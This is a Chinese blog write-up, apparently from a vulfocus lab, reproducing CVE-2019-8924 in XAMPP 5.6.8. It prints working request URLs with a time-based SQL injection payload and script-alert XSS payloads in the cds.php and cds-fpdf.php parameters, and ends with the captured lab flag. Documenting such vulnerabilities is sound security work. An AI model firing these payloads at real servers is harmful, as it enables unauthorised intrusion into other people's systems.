Kratos-karasama


Wecome to karasama's world!

xampp 存储型XSS(CVE-2019-8924)

2026年4月27日 0条评论 147次阅读 0人点赞 kalasama

xampp 存储型XSS(CVE-2019-8924)

描述

XAMPP是一个把Apache网页服务器与PHP、Perl及MariaDB集合在一起的安装包,允许用户可以在自己的电脑上轻易的创建网页服务器。

XAMPP through 5.6.8 allows XSS via the cds-fpdf.php interpret or titel parameter

影响范围

XAMPP 5.6.8

依旧vulfocus环境启动访问

image

sql延时注入

测试存在sql延时注入

http://localhost/xampp/cds-fpdf.php?interpret=SQLi&titel=SQLi&jahr=1984%20%20AND%20sleep%285%29

还是这个页面

xss弹窗

http://123.58.224.8:51237/xampp/cds.php?interpret=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&titel=XSS&jahr=1984

然后再次访问这个cd

是cds-fpdf.php

/xampp/cds-fpdf.php?interpret=XSS&titel=<script>alert("XSS")</script>&jahr=1984

http://ip/xampp/cds-fpdf.php?interpret=XSS&titel=<script>alert("XSS")</script>&jahr=1984

image

其实访问这个路径就可以触发了

/xampp/cds-fpdf.php

image

flag在主页phpinfo()的env环境中

image

flag-{bmh3aee2bf6-a637-400f-879c-6af3ac50be97}

本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可
点赞
No Tag
最后编辑:2026年4月27日

发表回复

电子邮件地址不会被公开。必填项已用 * 标注